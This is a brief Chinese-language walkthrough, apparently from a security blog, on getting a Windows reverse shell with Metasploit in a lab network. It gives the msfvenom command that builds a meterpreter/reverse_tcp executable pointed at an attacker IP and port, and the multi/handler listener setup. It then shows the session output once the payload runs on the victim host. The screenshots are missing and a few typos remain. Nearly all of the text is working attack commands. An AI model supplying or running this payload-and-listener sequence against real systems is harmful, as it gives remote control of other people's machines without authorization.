网络拓扑:
kaili系统版本:
注:前面的版本在生成shellcode的时候用的是msfpayload命令
1.kaili生成shellcode:root@debian:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.152.131 lport=1211 -f exe > /root/shell.exe
()
2.侦听shellcode:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.152.131
lhost => 192.168.152.131
msf exploit(multi/handler) > set lport 1211
lport => 1211
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.152.131:1211 3.将生成的sehllcode上传至windows主机中并运行:
4.已经有session返回
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.152.131:1211
[*] Sending stage (179779 bytes) to 192.168.152.129
[*] Meterpreter session 1 opened (192.168.152.131:1211 -> 192.168.152.129:1039) at 2018-02-24 07:58:44 +00005.成功拿到shell:
